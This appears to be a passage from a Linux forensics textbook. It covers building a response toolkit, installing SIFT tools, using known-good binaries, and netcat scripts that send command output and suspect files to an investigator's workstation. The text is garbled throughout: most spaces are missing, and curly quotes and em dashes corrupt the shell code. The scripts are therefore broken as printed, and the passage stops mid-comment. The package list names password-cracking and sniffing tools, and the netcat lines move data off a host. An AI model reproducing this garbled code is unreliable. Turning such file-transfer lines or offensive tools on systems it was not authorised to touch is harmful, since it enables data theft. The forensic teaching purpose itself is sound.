AscanbeseeninFigure1.2,itallbeginswithacall.Someonebelievesthatabreach(orsomethingelse)hasoccurredandtheyhavecalledyoutoinvestigate.Yournextstepistodeterminewhetherornot therewasabreach.Asmall amountof liveanalysismightberequiredinordertomakethisdetermination.Ifnobreachoccurred,yougettodocumentwhathappenedandaddthistoyourknowledgebase.

If therewas an incident, youwould normally startwith live analysis before decidingwhether or not dead analysis is justified. If you deem it necessary to perform the deadanalysisyouneedtoacquiresomeimagesandthenactuallyperformtheanalysis.Whetherornotyouperformedadeadanalysisitisn’toveruntilthereportsarewritten.Allofthesestepswillbediscussedindetailinfuturechapters.

BUILDINGATOOLKITInordertodoLinuxforensicseffectivelyyoumightwanttoacquireafewtools.WhenitcomestosoftwaretoolsyouareinluckasalloftheLinuxforensicstoolsarefree(mostare alsoopen source). In addition to thenotebookdiscussedpreviously, somehardwareandsoftwareshouldbeineveryforensicinvestigator’stoolkit.

HardwareYouwilllikelywantoneormoreexternalharddrivesformakingimages(bothRAMandhard disks). External hard drives are preferred as it ismuch easier to sharewith otherinvestigatorswhentheycanjustpluginadrive.USB3.0devicesarethebestastheyaresignificantlyfasterthantheirUSB2.0counterparts.

Awriteblockerisalsohelpfulwheneveranimageistobemadeofanymedia.Severalhardwarewriteblockersareavailable.Mostofthesearelimitedtooneparticularinterface.If your budget affords only one hardware write blocker, I would recommend a SATAblockerasthisisthemostcommoninterfaceinuseatthistime.Softwarewriteblockersarealsoapossibility.Asimplesoftwarewriteblockerispresentedlaterinthisbook.

SoftwareSoftwareneedsfall intoafewcategories:forensictools,systembinaries,andliveLinuxdistributions. Ideally these tools are stored onUSB 3.0 flash drives and perhaps a fewDVDsifyouanticipateencounteringsystemsthatcannotbootfromaUSBdrive.Givenhow cheapUSB flash drives are today, even investigatorswithmodest budgets can bepreparedformostsituations.

Thereareanumberofwaystoinstallasetofforensicstools.Theeasiestmethodistoinstall a forensics oriented Linux distribution such as SIFT from SANS (http://digital-forensics.sans.org/community/downloads).Personally,IprefertotorunmyfavoriteLinuxandjustinstallthetoolsratherthanbestuckwithsomeoneelse’sthemesandsluggishlivesystem performance. The following scriptwill install all of the tools found in SIFT onmostDebianorUbuntubasedsystems(unliketheSANSinstallscriptthatworksonlyonspecificversionsofUbuntu).#!/bin/bash

#SimplelittlescripttoloadDFIRtoolsintoUbuntuandDebiansystems

#byDr.PhilPolstra@ppolstra

#createrepositories

echo“debhttp://ppa.launchpad.net/sift/stable/ubuntutrustymain”\

>/etc/apt/sources.list.d/sift-ubuntu-stable-utopic.list

echo“debhttp://ppa.launchpad.net/tualatrix/ppa/ubuntutrustymain”\

>/etc/apt/sources.list.d/tualatrix-ubuntu-ppa-utopic.list

#listofpackages

pkglist=”aeskeyfind

afflib-tools

afterglow

aircrack-ng

arp-scan

autopsy

binplist

bitpim

bitpim-lib

bless

blt

build-essential

bulk-extractor

cabextract

clamav

cryptsetup

dc3dd

dconf-tools

dumbpig

e2fslibs-dev

ent

epic5

etherape

exif

extundelete

f-spot

fdupes

flare

flasm

flex

foremost

g++

gcc

gdb

ghex

gthumb

graphviz

hexedit

htop

hydra

hydra-gtk

ipython

kdiff3

kpartx

libafflib0

libafflib-dev

libbde

libbde-tools

libesedb

libesedb-tools

libevt

libevt-tools

libevtx

libevtx-tools

libewf

libewf-dev

libewf-python

libewf-tools

libfuse-dev

libfvde

libfvde-tools

liblightgrep

libmsiecf

libnet1

libolecf

libparse-win32registry-perl

libregf

libregf-dev

libregf-python

libregf-tools

libssl-dev

libtext-csv-perl

libvshadow

libvshadow-dev

libvshadow-python

libvshadow-tools

libxml2-dev

maltegoce

md5deep

nbd-client

netcat

netpbm

nfdump

ngrep

ntopng

okular

openjdk-6-jdk

p7zip-full

phonon

pv

pyew

python

python-dev

python-pip

python-flowgrep

python-nids

python-ntdsxtract

python-pefile

python-plaso

python-qt4

python-tk

python-volatility

pytsk3

rsakeyfind

safecopy

sleuthkit

ssdeep

ssldump

stunnel4

tcl

tcpflow

tcpstat

tcptrace

tofrodos

torsocks

transmission

unrar

upx-ucl

vbindiff

virtuoso-minimal

winbind

wine

wireshark

xmount

zenity

regripper

cmospwd

ophcrack

ophcrack-cli

bkhive

samdump2

cryptcat

outguess

bcrypt

ccrypt

readpst

ettercap-graphical

driftnet

tcpreplay

tcpxtract

tcptrack

p0f

netwox

lft

netsed

socat

knocker

nikto

nbtscan

radare-gtk

python-yara

gzrt

testdisk

scalpel

qemu

qemu-utils

gddrescue

dcfldd

vmfs-tools

mantaray

python-fuse

samba

open-iscsi

curl

git

system-config-samba

libpff

libpff-dev

libpff-tools

libpff-python

xfsprogs

gawk

exfat-fuse

exfat-utils

xpdf

feh

pyew

radare

radare2

pev

tcpick

pdftk

sslsniff

dsniff

rar

xdot

ubuntu-tweak

vim”

#actuallyinstall

#firstupdate

apt-getupdate

forpkgin${pkglist}

do

if(dpkg—list|awk‘{print$2}’|egrep“^${pkg}$”2>/dev/null);

then

echo“yeah${pkg}alreadyinstalled”

else

#trytoinstall

echo-n“Tryingtoinstall${pkg}…”

if(apt-get-yinstall${pkg}2>/dev/null);then

echo“+++Succeeded+++”

else

echo“–-FAILED–-”

fi

fi

done

Briefly,theabovescriptworksasdescribedhere.First,werunaparticularshell(bash)

usingthespecialcommentconstruct#!{commandtorun}.This isoftencalledthe“she-bang” operator or “pound-bang” or “hash-bang,” Second, the lines with the echostatements add two repositories to our list of software sources. Technically, theserepositoriesareintendedtobeusedwithUbuntu14.04,buttheyarelikelytoworkwithnewversionsofUbuntuand/orDebianaswell.

Third,avariablenamedpkglistiscreatedwhichcontainsalistofthetoolswewishtoinstall.Fourth,weupdateourlocalapplicationcachebyissuingthecommandapt-getupdate.Finally,weiterateoverourlistofpackagesstoredinpkglistandinstallthemiftheyaren’talready installed.The test involvesastringofcommands,dpkg—list|awk‘{print$2}’|egrep“^${pkg}$”2>/dev/null.The commanddpkg—list listsallinstalledpackagesandthislist isthenpassedtoawk‘{print$2}’ which causes the secondword (the package name) to be printed; this is in turnpassed toegrep“^${pkg}$”2>/dev/nullwhich checks to see if the packagenameexactlymatchesonethatisinstalled(the^matchesthestartand$matchestheend).Anyerrorsaresenttothenulldevicebecauseweonlycareiftherewereanyresults.

A set of known good system binaries should be installed to a flash drive in order tofacilitate live response.Ataminimumyouwillwant the /bin, /sbin, and /libdirectories(/lib32and/lib64for64-bitsystems)fromaknowngoodsystem.Youmayalsowanttograb the /usrdirectoryorat least /usr/local/, /usr/bin,and /usr/sbin.MostLinuxsystemsyouarelikelytoencounterarerunning64-bitversionsofLinux;afterall,64-bitLinuxhasbeenavailablesincebefore64-bitprocessorswerecommerciallyavailable. Itmightstillbeworthhavinga32-bitsystemonhand.

On occasion a liveLinux system installed on a bootableUSB drive could be useful.EitheradistributionsuchasSIFTcanbeinstalledbyitselfonadriveorthelivesystemcan be installed on the first partition of a larger USB drive and the system binariesinstalledonasecondpartition.IfyouareusingaUSBdrivewithmultiplepartitionsitisimportanttoknowthatWindowssystemswillonlyseethefirstpartitionandthenonlyifitisformatedasFATorNTFS.PartitionscontainingsystembinariesshouldbeformattedasEXT2,EXT3,orEXT4inordertomountthemwithcorrectpermissions.Detailsofhowtomountthesesystembinarieswillbeprovidedinfuturechapters.

THISISTAKINGTOOLONGRunningliveLinuxinavirtualmachineIf youdecide to create abootableSIFT (or similar)USBdriveyouwill quicklyfind that it takes hours to install the packages from SIFT. This can tie up yourcomputer for hours preventing you from getting any realwork done. There is awaytobuildtheUSBdrivewithouttyingupthemachine,however.WhatyouneedtodoissetupavirtualmachinethatcanberunfromaliveLinuxdistributiononaUSB drive. The following instructions assume you are runningVirtualBox on aLinuxhostsystem.

VirtualBoxshipswithseveral tools.Oneof these iscalledvboxmanage.Thereare several commands vboxmanage supports. Typingvboxmange–help in aterminalwillgiveyoualonglistofcommands.Thiswillnotlistthecommandthatweneed,however,asitisoneoftheinternalcommands.

Inordertocreateavirtualdiskthatpointstoaphysicaldeviceyoumustexecutethe following command as root: vboxmanage internalcommandscreaterawvmdk -filename <location of vmdk file> -rawdisk <USB device>. For example, if your thumb drive is normallymounted as /dev/sdb the following command could be used: vboxmanageinternalcommands createrawvmdk -filename/root/VirtualBox\Vms/usb.vmdk-rawdisk/dev/sdb.Note thatyou cannot just sudo this command as the regular user will have permissionproblems trying to run the virtual machine later. Creating this virtual drive andrunningVirtualBoxisshowninFigure1.3.

Oncethevirtualdiskfilehasbeencreated,setupanewvirtualmachineinthenormalmanner.Dependingon the liveLinuxyouhavechosen,youmayneed toenableEFIsupportasshowninFigure1.7.ThecreationoftheliveLinuxvirtualmachine isshowninFigure1.4 throughFigure1.6.ThevirtualmachinerunningforthefirsttimeisshowninFigure1.8.

FIGURE1.3

CreatingavirtualdiskfilethatpointstoaphysicalUSBdrive.

FIGURE1.4

CreatingavirtualmachinethatrunsaliveLinuxdistributionfromaUSBdrive.

FIGURE1.5

SettingupmemoryfortheliveLinuxvirtualmachine.BecertaintoselectthemaximumamountofmemoryforbetterperformancerunningalivedistributionaseverythingisrunfromRAM.

FIGURE1.6

SelectingtheUSBphysicaldrivefortheliveLinuxvirtualmachine.

FIGURE1.7

EnablingEFIsupportinVirtualBox.

FIGURE1.8

RunningavirtualmachinefromaUSBdrive.

SUMMARYIn thischapterwehavediscussedall thepreliminary items that shouldbe takencareof

before arriving on the scene after a suspected incident has occurred. We covered thehardware,software,andothertoolsthatshouldbeinyourgobag.Inthenextchapterwewilldiscussthefirstjobwhenyouarrive,determiningiftherewasanincident.

CHAPTER

2DeterminingIfThereWasanIncidentINFORMATIONINTHISCHAPTER:

OpeningacaseTalkingtousersDocumentationMountingknown-goodbinariesMinimizingdisturbancetothesubjectsystemUsingscriptingtoautomatetheprocessCollectingvolatiledata

OPENINGACASEThis chapterwill address the highlighted box from our high-level process as shown inFigure 2.1. We will come to learn that there is often much involved in determiningwhetherornottherewasanincident.Wewillalsoseethatsomelimitedliveresponsemaybenecessaryinordertomakethisdetermination.

FIGURE2.1

TheHigh-levelInvestigationProcess.

Beforeyoudoanythingelse,whenyouarriveonthescene,youshouldopenacasefile.Thisisnotascomplicatedasitsounds.Youcouldliterallycreateafolderonyourlaptopwithacasenumber.What shouldyouuse foracasenumber?Whateveryouwant.Youmightwantacasenumberthatisayear-numberoryoumightprefertousethedateforacasenumberundertheassumptionthatyouwon’tbestartingmultiplecasesonthesameday.Youcouldalwaysappendanumbertothedateifyouhadmultiplecasesinagivenday.

You might also consider starting a new entry in your bound notebook (with thenumbered pages). Somemight prefer to wait until they are sure there was an incidentbeforeconsumingspaceintheirnotebooksforafalsealarm.Mypersonalfeelingonthisisthatnotebooksarecheapanditiseasierandcleanerifyoustarttakingnotesinoneplacefromtheverybeginning.

TALKINGTOUSERSBeforeyoueverthinkabouttouchingthesubjectsystemyoushouldinterviewtheusers.Why?Because theyknowmoreabout thesituation thanyouwill.Youmightbeable todeterminethatitwasallafalsealarmveryquicklybytalkingtotheusers.Forexample,perhapsitwasasystemadministrator thatputanetworkcardinpromiscuousmodeandnotmalwareoranattacker. Itwouldbe farbetter foreveryone ifyou found thisoutbytalkingtotheadministratornowthanafterhoursofinvestigating.

You should ask the users a series of questions. The first question youmight ask is,“Whydidyou callme?”Was there an event that led toyourbeing called in?Does theorganizationlackaqualifiedpersontoperformtheinvestigation?Doestheorganization’spolicyonpossibleincidentsrequireanoutsideinvestigator?

The second question you might ask is, “Why do you think there is a problem orincident?” Did something strange happen? Is the network and/or machine slower thannormal?Istheretrafficonunusualports?UnlikeWindowsusers,mostLinuxusersdon’tjustshrugoffstrangebehaviorandreboot.

Next you want to get as much information as you can about the subject (suspectedvictim)system.Whatisthesystemnormallyusedfor?Wheredidthesystemcomefrom?Wasitpurchasedlocallyoronline,etc?Asmanyreadersarelikelyaware,ithascometolight that certain government entities are not above planting parasitic devices inside acomputer that has been intercepted during shipment. Has the computer been repairedrecently? If so, by whom? Was it an old, trusted friend or someone new? Malicioussoftwareandhardwareareeasilyinstalledduringsuchrepairs.

DOCUMENTATIONAspreviouslymentioned,youcannotoverdothedocumentation.Youshouldwritedownwhat the users told you during your interviews. In addition to the advantages alreadymentioned forusinganotebook,writingnotes inyournotebook is a lot lessdistractingandintimidatingfortheusersthanbangingawayatyourlaptopkeyboardorevenworsefilmingtheinterviews.

Youshouldalsowritedowneverythingyouknowaboutthesubjectsystem.Ifitseemsappropriateyoumightconsidertakingapictureofthecomputerandscreen.Ifyoususpectthatphysicalsecurityhasbeenbreached,itisanespeciallygoodidea.Youarenowreadytoactuallytouchthesubjectsystem.

VIRTUALCOMPLICATIONSIfyouareusingavirtualmachine,oldermaybebetterIhavepreviouslyrecommendedtheuseofaUSB3.0driveforperformancereasons.Ifyouareusingavirtualmachinetopracticewhileyouaregoingthroughthisbook,a USB 2.0 drive might be preferred. The reason for this is that some of thevirtualization software seems to have issues dealingwithUSB3.0devices.At thetimeofthiswritingUSB2.0devicesseemtocauselessproblems.

Regardlessofthetypeofdriveyouhave,thehostoperatingsystemswillinitiallytrytolayclaimtoanyattacheddevice.IfyouareusingVirtualBox,youwillneedtocheck the appropriate device from the USB Devices submenu under Devices asshowninFigure2.2.

FIGURE2.2

SelectingaUSBDrive.Ifyoursubjectsystemisrunninginsideavirtualmachineyouwillneedtopassthedevicealongtothevirtualmachinebyselectingthedeviceasshownhere.

MOUNTINGKNOWN-GOODBINARIESIn most cases if you insert your USB drive with known-good binaries, it will beautomounted.Ifthisisn’tthecaseonthesubjectsystem,youwillneedtomanuallymountthedrive.Onceyourdriveismountedyoushouldrunaknown-goodshelllocatedonyourdrive.Youarenotdoneafteryourunthisshell,however.Youmustsetyourpathtoonlypoint at the directories on your USB drive and also reset the LD_LIBRARY_PATHvariabletoonlyreferencelibrarydirectoriesontheUSBdrive.

The first thing youwillwant to do is to check that your filesystem has in fact beenmounted.SomeversionsofLinuxwillnotautomaticallymountanextended(ext2,ext3,orext4)filesystem.MostLinuxsystemswillautomountaFATorNTFSfilesystem,however.Recall that your system binariesmust be housed on an extended filesystem in order topreservetheirpermissions.Theeasiestwaytocheckifsomethingismountedistoexecutethemount command. The results of running this command with my Linux forensicsresponsedriveareshowninFigure2.3.Noticethatmydriveismountedas/dev/sdbwiththreepartitions.ThefirsttwopartitionsareaFATandext4partitionforaliveversionofLinux(SIFTinthiscase)andthethirdpartitioncontains64-bitsystembinaries.

FIGURE2.3

Verifying That a USBDrive IsMounted. In this figure the three highlighted partitions from the USB drive(/dev/sdb)haveallbeenautomaticallymounted.

Ifyouareunsurewhatdriveletterwillbeassignedtoyourincidentresponsedrivethedmesgcommandcanoftenhelp.TheresultsofrunningdmesgafterinsertingaUSBdriveare shown in Figure 2.4. The portion that demonstrates the drive has been assigned to

/dev/sdbishighlighted.

FIGURE2.4

Result of running dmesg command. The portion that shows drive letter /dev/sdb has been assigned ishighlighted.

Ifyouneed tomanuallymountyourdrive firstcreateamountdestinationby runningsudomkdir/mnt/{destination}, i.e.sudomkdir/mnt/good-binsorsimilar. Now that a destination exists the drive can be mounted using sudo mount/dev/{source partition} /mnt/{destination}, i.e. sudo mount/dev/sdb1/mnt/good-bins.

Onceeverythingismountedchangeto therootdirectoryforyourknow-goodbinariesandthenrunbashbytypingexecbin/bashasshowninFigure2.5.Oncetheknown-goodshellisloadedthepathmustberesettoonlypointtotheresponsedrivebyrunningexportPATH=$(pwd)/sbin:$(pwd)/bin as shown in Figure 2.6.Herewe areusingashelltrick.Ifyouencloseacommandinparenthesesthatareproceededbya$thecommandisrunandtheresultsaresubstituted.Finally,thelibrarypathmustalsobesettopoint to known-good library files by running exportLD_LIBRARY_PATH=$(pwd)/lib64:$(pwd)/libasshowninFigure2.7. Ifyouhave also copied some of the directories under /usr (recommended) then these pathsshouldalsobeincludedinthePATHandLD_LIBRARY_PATH.

FIGURE2.5

Executingtheknown-goodbashshell.

FIGURE2.6

Makingthepathpointtoknown-goodbinaries.

FIGURE2.7

Makingthelibrarypathpointtoknown-goodfiles.

MINIMIZINGDISTURBANCETOTHESUBJECTSYSTEMUnfortunately, it is impossible to collect all the data from a running system withoutcausingsomethingtochange.Yourgoalasaforensicinvestigatorshouldbetominimizethisdisturbancetothesubjectsystem.Therearetwothingsyoushouldneverdoifyoucanavoidit.First,donotinstallanythingonthesubjectsystem.Ifyouinstallnewsoftwareitwill substantially change the systemwhen configuration files, libraries, and executablesare saved to the subject’s media. The worst possible situation would be to compilesomethingfromsourcecodeasitwillcausemanytemporaryfilestobecreatedandwillalso consume memory (possibly pushing out other more interesting information) andaffectamemoryimageshouldyouchoosetomakeone.

Thesecondthingyoushouldavoidiscreatingnewfilesonthesystem.Ifyoumustuseatoolthatisnotinstalled,haveitonyourresponseUSBdrive.Don’tcreatememoryordiskimagesandthenstorethemonthesubjectsystemeither!

YouwilldefinitelyalterwhatisinRAMwhenyouinvestigateasystem.Youshouldtrytominimizeyourmemoryfootprint,however.Thereareacoupleofwaysthatyoumightaccomplish these goals. Two popular solutions are to store data onUSBmedia (whichcouldbeyourresponsedrive)ortousethenetcatutility.

UsingaUSBdrivetostoredataAttachingaUSBdrivetothesubjectsystemisminimallyinvasive.Thiswillcausesomenewentriesinafewtemporarypseudofilesystemssuchas/procand/sysandthecreationofanewdirectoryunder/mediaonmostversionsofLinux.AfewlargerUSB3.0backup

drives should be in your toolkit for just such occasions. Itmight be best to copy yoursystembinaries to thisdrivefirstshouldyouendupgoing this route toavoidhaving tomountmorethanoneexternaldrive.

OncetheUSBdrivehasbeenattachedyoucanusethetechniquesdescribedearliertooperatewithknown-goodsystembinariesandutilities.LogfilesandotherdatadiscussedinthischaptercanbestoredtotheUSBdrive.TechniquesdescribedinlaterchapterscanbeusedtostoreimagesontheUSBdrive.Evenifyouusedthenetcatutility(describednext), having someUSBbackupdrives onhand canmake sharing imagesmuch easier.Naturally,whateveryoudoshouldbedocumentedinyourboundnotebook.

UsingNetcatWhileusingaUSBdrivemeetsourgoalsofnotinstallinganythingorcreatingnewfilesonthesubjectsystem(withtheexceptionsnotedabove)itdoesnotminimizeourmemoryfootprint.Copying toslowUSBstoragedevices (especiallyUSB2.0drives) is likely toresult ina significantamountofcachingwhichwill increaseourmemory footprint.Forthis reason, the use ofnetcat is preferredwhen the subject system is connected to anetworkofreasonablespeedandreliability.

Wired gigabitEthernet is themost desirablemedia. If you are forced to usewirelessnetworking,doyourbesttoensureyourforensicsworkstationhasastrongsignalfromtheaccesspoint.Ifneitheroftheseareanoption,youmaybeabletoconnectyourforensicslaptopdirectlytothesubjectsystemviaacrossovercable.

Realize that thesubjectsystemisprobablysetup touseDynamicHostConfigurationProtocol(DHCP)soyouwilleitherneedtousestaticIPaddressesonbothendsorinstallaDHCPserveronyourforensicslaptopifyougothecrossovercableroute.Ifthesubjectsystem has only one network interface thatmust be disconnected I recommend againstusing thecrossovercableas itwilldisturb thesystemtoomuch.To temporarilysetupastatic IP on each end of your crossover cable issue the command sudoifconfig{interface} down && sudo ifconfig {interface} {IP} netmask{netmask}up,i.e.sudoifconfigeth0down&&sudoifconfigeth0192.168.1.1 netmask 255.255.255.0 up. Make sure you give each end adifferentIPonthesamesubnet!

Settingupanetcatlistener

Youwillneedtosetuponeormorelistenersontheforensicsworkstation.Thesyntaxforsettingupalistenerisprettysimple.Typingnetcat-l{port}willcausealistenerto be created on every network interface on the machine. Normally this informationshould be stored in a file by redirecting netcat’s output using > or >>. Recall that thedifference between> and>> is that > causes an existing file to be overwritten and>>appendsdataifthefilealreadyexists.

I recommend that you create a listener on the forensicsworkstation that receives theoutputofallthecommandsyouwishtorunonthesubjectsysteminasinglelogfile.Thiskeeps everything in one place. By default netcat will terminate the listener upon

receivingtheend-of-file(EOF)marker.The-koptionfornetcatwillkeepthelisteneraliveuntilyoupressControl-Cintheterminalwhereyoustartednetcat.Thecommandto start the log file listener is netcat -k -l {port} >> {log file}, i.e.netcat-k-l9999>>example-log.txt.ThiscommandisshowninFigure2.8.NotethatwhileIhaveusednetcatherethisisasymboliclinktothesameprogrampointedtobynconmostsystems,soyoucanusewhicheveryouprefer.

FIGURE2.8

Runninganetcatlistenerontheforensicsworkstation.

SendingdatafromthesubjectsystemNowthatyouhavealistenerontheforensicsworkstationitiseasytosenddataacrossthenetwork using netcat. The general sequence for sending something for logging is{command} | nc {forensic workstation IP} {port}. For commandsthat do not have output thatmakes it obviouswhatwas run youmightwant to send aheaderofsortsusingtheechoutilitybeforesendingtheoutputof thecommand.This isdemonstratedinFigure2.9.TheresultsofrunningthecommandsshowninFigure2.9areshown inFigure2.10.Usingscripting toautomate thisprocess isdiscussed later in thischapter.

FIGURE2.9

Usingnetcattosendinformationtotheforensicsworkstation.

FIGURE2.10

ResultsreceivedbylistenerfromcommandsinFigure2.9.

SendingfilesItisnotunusualtoextractsuspiciousfilesfromasubjectsystemforfurtherstudy.Netcat

is alsohandy forperforming this task. Inorder to receivea fileyou should start anewlistenerontheforensicsworkstationthatdoesn’tusethe-koption.Inthiscaseyouwanttoendthelistenerafterthefilehasbeentransmitted.Thecommandisnc-l{port}>{filename}.

Onthesubjectsystemthesuspectfileisredirectedintothenetcattalker.Thesyntaxfor sending the file is nc {forensic workstation IP} {port} <{filename}, i.e.nc192.168.1.1194444</bin/bash. The listener andtalkerforthisfiletransferareshowninFigure2.11andFigure2.12,respectively.

FIGURE2.11

Settingupanetcatlistenertoreceiveafile.

FIGURE2.12

Usingnetcattosendafile.

USINGSCRIPTINGTOAUTOMATETHEPROCESSIt should be fairly obvious that our little netcat system described above is ripe forscripting.The first questiononemight ask iswhat sort of scripting language shouldbeused.ManywouldimmediatelyjumptousingPythonforthistask.WhileImightliketousePythonformanyforensicsandsecuritytasks,itisnotthebestchoiceinthiscase.

Thereareacoupleofreasonswhyshellscriptingisabetterchoice,inmyopinion.First,we want to minimize our memory footprint, and executing a Python interpreter runscounter to that goal. Second, a Python script that primarily just runs other programs issomewhatpointless.Itismuchsimplertoexecutetheseprogramsdirectlyinashellscript.As an additional bonus for some readers, the scripts described here constitute a niceintroductiontobasicshellscripting.

ScriptingtheserverThescriptsshownbelowwillcreateanewdirectoryforcasefilesandstarttwolisteners.Thefirstlistenerisusedtologcommandsexecutedonthesubject(client)machineandthesecond is used to receive files.A script to clean up and shut down the listeners is alsopresented.Hereisthemainscript,start-case.sh:#!/bin/bash

#

#start-case.sh

#

#Simplescripttostartanewcaseonaforensics

#workstation.Willcreateanewfolderifneeded

#andstarttwolisteners:oneforloginformation

#andtheothertoreceivefiles.Intendedtobe

#usedaspartofinitialliveresponse.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:$0<casenumber>”

echo“Simplescripttocreatecasefolderandstartlisteners”

exit1

}

if[$#-lt1];then

usage

else

echo“Startingcase$1”

fi

#ifthedirectorydoesn’texistcreateit

if[!-d$1];then

mkdir$1

fi

#createtheloglistener

`nc-k-l4444>>$1/log.txt`&

echo“Startedloglistenerforcase$1on$(date)”|nclocalhost4444

#startthefilelistener

`./start-file-listener.sh$1`&

This script starts with the special comment “#!” also known as the she-bang whichcausesthebashshelltobeexecuted.Itisimportanttorunaparticularshellasuserswhoareallowedtopicktheirownmightselectsomethingincompatiblewithyourscript.A#anywhereona linebeginsacommentwhich terminatesat theendof the line.The firstseverallinesarecommentsthatdescribethescript.

After thecommentsafunctioncalledusage isdefined.Todefineafunction inashellscript simply type itsname followedbya space, emptyparentheses, another space, andthenenclosewhatevercommandsmakeupthefunctionincurlybrackets.Unlikecompiledlanguages and some scripting languages, shell scripts requirewhite space in the properplaces or they will not function correctly. The $0 in the line echo “usage: $0<casenumber>”isavariablethatissettothefirstcommandlineparameterthatwasusedtorunthescript,whichisthenameofthescriptfile.

Note the use of double quotes in the echo commands. Anything enclosed in doublequotes is expanded (interpreted)by the shell. If singlequotes areused, no expansion is

performed.Itisconsideredagoodprogrammingpracticetodefineausagefunctionthatisdisplayedwhenausersuppliescommandlineargumentsthatdonotmakesense.

The lineif [ $# -lt 1 ] ; then begins an if block. The logical test isenclosedinsquarebrackets.Notethattheremustbewhitespacearoundthebracketsandbetween parts of the logical test as shown. The variable $# is set to the number ofcommandlineargumentspassedintothescript.Inthisscriptifthatnumberislessthan1,theusage function is called, otherwise amessage about starting a case is echoed to thescreen.Thevariable$1isthefirstcommandlineparameterpassedin(rightafterthenameofthescript)whichismeanttobethecasename.Observethattheifblockisterminatedwithfi(ifspelledbackwards).

Theconditionalstatementintheifblockthatstartswithif[!-d$1];thenchecks to see if the case directory does not yet exist. The -d test checks to see that adirectorywith thename that followsexists.The !negates (reverses) the test so that thecodeinsidetheifblockisexecutedifthedirectorydoesn’texist.Thecodesimplyusesmkdirtocreatethedirectory.

Next the line`nc-k-l4444>>$1/log.txt`& starts a listener on port4444andsendseverythingreceivedtoafileinthecasedirectorynamedlog.txt.Notethecommandisenclosedinbackticks(backwardsinglequotes).Thistellstheshelltopleaserunthecommand.The&causesthecommandtoberuninthebackgroundsothatmorethingsmaybeexecuted.

Thenextlinesimplyechoesabannerwhichispipedtothelistenerinordertocreateaheaderfor the logfile.Finally,anotherscript isalsorun in thebackground.Thisscriptsstartsthefilelistenerprocess.Thisscriptisdescribednext.#!/bin/bash

#

#start-file-listener.sh

#

#Simplescripttostartanewfile

#listener.Intendedtobe

#usedaspartofinitialliveresponse.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

#Whenafilenameissenttoport5555atransferon5556

#isexpectedtofollow.

usage(){

echo“usage:$0<casename>”

echo“Simplescripttostartafilelistener”

exit1

}

#didyouspecifyacasename?

if[$#-lt1];then

usage

fi

whiletrue

do

filename=$(nc-l5555)

nc-l5556>$1/$(basename$filename)

done

Thisscriptstartswiththestandardshe-bangwhichcausesthebashshelltobeused.Italsodefinesausagefunctionwhichiscalledifacasenameisnotpassedintothescript.Therealworkinthisscriptisinthewhileloopattheend.Thelinewhiletruecausesan infinite loopwhich is only exitedwhen the user pressesControl-Cor the process iskilled. Note that unlike the if block which is terminated with fi, the do block isterminatedwithdone(notod).

The first line in the loop runs anetcat listener onport 5555 and sets the filenamevariableequaltowhateverwasreceivedonthisport.Recallthatwehaveusedthistrickofrunning a command inside of $() to set a variable equal to the command results in thepreviousscript.Onceafilenamehasbeenreceivedanewlistenerisstartedonport5556(nc-l5556onthenextline)andtheresultsdirectedtoafilewiththesamenameinadirectory named after the case name (> $1/$(basename $filename) on thesecondhalfoftheline).Thefirstcommandlineargument,whichshouldbethecasename,isstoredin$1.Thebasenamecommandisusedtostripawayanyleadingpathforafilethatissent.

Onceafilehasbeenreceived,theinfiniteloopstartsanewlisteneronport5555andthecycle repeats itself. The loop exits when the cleanup script, to be described next, isexecuted.Theclientsidescriptsthatsendloginformationandfileswillbediscussedlaterinthischapter.#!/bin/bash

#

#close-case.sh

#

#Simplescripttostartshutdownlisteners.

#Intendedtobeusedaspartofinitialliveresponse.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

echo“Shuttingdownlistenersat$(date)atuserrequest”|nclocalhost4444

killallstart-case.sh

killallstart-file-listener.sh

killallnc

Thisisoursimplestscriptyet.Firstweechoaquickmessagetoourloglisteneronport

4444, then we use the killall utility to kill all instances of our two scripts andnetcat. If you arewonderingwhywe need to killnetcat since it is called by thescripts,recallthatinsomecasesitisruninthebackground.Also,therecouldbeahungorin-processnetcatlistenerortalkeroutthere.Forthesereasonsitissafestjusttokillallthenetcatprocesses.

ScriptingtheclientNowthatwehaveaserver(theforensicsworkstation)waitingforustosendinformation,wewillturnourattentiontowardscriptingtheclient(subjectsystem).BecauseitwouldbebothersometoincludetheforensicsworkstationIPaddressandportswitheveryaction,wewill start by setting some environment variables to be used by other client scripts. Asimplescripttodojustthatfollows.#setup-client.sh

#

#Simplescripttosetenvironmentvariablesfora

#systemunderinvestigation.Intendedtobe

#usedaspartofinitialliveresponse.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

#PentesterAcademy.com.

usage(){

echo“usage:source$0<forensicsworkstationIP>[logport][filenameport][filetransferport]”

echo“Simplescripttosetvariablesforcommunicationtoforensicsworkstation”

exit1

}

#didyouspecifyafile?

if[$#-lt1];then

usage

fi

exportRHOST=$1

if[$#-gt1];then

exportRPORT=$2

else

exportRPORT=4444

fi

if[$#-gt2];then

exportRFPORT=$3

else

exportRFPORT=5555

fi

if[$#-gt3];then

exportRFTPORT=$4

else

exportRFTPORT=5556

fi

Noticethatthereisnoshe-bangatthebeginningofthisscript.Whynot?Recallthatyouwanttorunyourknown-goodversionofbash,notthepossiblevandalizedoneinthe/bindirectory.Anotherreasonthisscriptisshe-bangfreeisthatitmustbesourcedinorderfortheexportedvariables tobeavailable innewprocesses inyourcurrent terminal.This isdone by running the command source ./setup-client.sh {forensicsworkstationIP}inaterminal.

The script repeatedlyuses theexport commandwhich sets a variable andmakes itavailable tootherprocesses in thecurrent terminaloranychildprocessesof thecurrentterminal.Variables that arenotexportedareonlyvisiblewithin theprocess that createdthemandwecreateanewprocesseachtimewetypebash{scriptname}.Settingthesevalueswouldbepointlessiftheywereneverseenbytheotherclientscripts.SincetheserverIPaddressisrequired,westoreitintheRHOSTvariable.Thenwechecktoseeifanyoftheoptionalparametersweresupplied;ifnotweexportadefaultvalue,ifsoweexportwhatevertheuserentered.

Thefollowingscriptwillexecuteacommandandsendtheresultswrappedinaheaderandfootertotheforensicsworkstation.Aswiththepreviousscript,thereisnoshe-bangandyoumustexplicitlyrunthescriptbytypingbash./send-log.sh{commandwitharguments}.#send-log.sh

#

#Simplescripttosendanewlogentry

#tolisteneronforensicsworkstation.Intendedtobe

#usedaspartofinitialliveresponse.

#byDr.PhilPolstra(@ppolstra)asdevelopedfor

